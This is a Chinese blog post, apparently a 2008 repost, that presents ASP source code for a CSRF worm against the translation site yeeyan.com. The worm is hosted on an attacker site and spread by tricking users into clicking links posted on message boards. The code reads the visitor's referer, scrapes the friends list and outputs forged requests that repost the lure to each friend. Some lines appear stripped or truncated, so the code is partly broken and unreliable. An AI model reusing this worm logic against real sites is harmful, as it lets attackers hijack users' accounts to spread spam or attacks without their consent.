译言的这个CSRF蠕虫脚本安全 -电脑资料

    nice job:)

    用服务端的Microsoft.XMLHTTP控件解决了可变ID的问题，

译言的这个CSRF蠕虫脚本安全

。只需要一个链接，类似于这样：http://www.evilsite.com/yeeyan.asp，发送到你的译言帐户的个人空间留言板去，欺骗用户点击后，就可以很快传播（向被“感染”用户的每个好友的留言板上发送相同信息，发送方是那些因为好奇而点击CSRF链接的人）。这完全不需要客户端脚本。

    yeeyan.asp code:

    <%

    'author: Xlaile

    'date: 2008-09-21

    'this is the CSRF Worm of www.yeeyan.com

    r = Request.ServerVariables("HTTP_REFERER")

    If instr(r,"http://www.yeeyan.com/space/show") > 0 Then

    Function regx(patrn, str)

    Dim regEx, Match, Matches

    Set regEx = New RegExp

    regEx.Pattern = patrn

    regEx.IgnoreCase = True

    regEx.Global = True

    Set Matches = regEx.Execute(str)

    For Each Match in Matches

    RetStr = RetStr & Match.Value & " | "

    Next

    regx = RetStr

    End Function

    Function bytes2BSTR(vIn)

    dim strReturn

    dim i1,ThisCharCode,NextCharCode

    strReturn = ""

    For i1 = 1 To LenB(vIn)

    ThisCharCode = AscB(MidB(vIn,i1,1))

    If ThisCharCode < &H80 Then

    strReturn = strReturn & Chr(ThisCharCode)

    Else

    NextCharCode = AscB(MidB(vIn,i1+1,1))

    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

    i1 = i1 + 1

    End If

    Next

    bytes2BSTR = strReturn

    End Function

    id = Mid(r,34)

    furl = "http://www.yeeyan.com/space/friends/" + id

    Set http=Server.CreateObject("Microsoft.XMLHTTP")

    http.Open "GET",furl,False

    http.Send

    ftext = http.ResponseText

    fstr = regx("show/(\d+)?"">[^1-9a-zA-Z]+

    farray = Split(fstr , " | ")

    Dim f(999)

    For i = 0 To ubound(farray) - 1

    f(i) = Mid(farray(i),6,Len(farray(i))-16)

    Next

    Set http=Nothing

    s = ""

    For i = 0 To ubound(farray) - 1

    s = s + ""

    Next

    Response.write(s)

    ' Set http=Server.CreateObject("Microsoft.XMLHTTP")

    ' http.open "POST","http://www.yeeyan.com/groups/newTopic/",False

    ' http.setrequestheader "Content-Type","application/x-www-form-urlencoded"

    ' c = "hello"

    ' cc = "data[Post][content]=" & c & "&" & "ymsgee=" & f(0) & "&" & "ymsgee_username=" & f(0)

    ' http.send cc

    End If

    %>

    yeeyan_iframe.asp code:

    <%

    'author: Xlaile

    'date: 2008-09-21

    'this is the CSRF Worm of www.yeeyan.com

    id = Request("id")

    s = ""

    s = s+""

    s = s+""

    s = s+""

    s = s+""

    Response.write(s)

    %>

    相关截图：

    导致CSRF的原形（yeeyan.asp发生作用后的客户端源码）：

    from:http://hi.baidu.com/ycosxhack/blog/item/f27786fd6fc97e1008244d06.html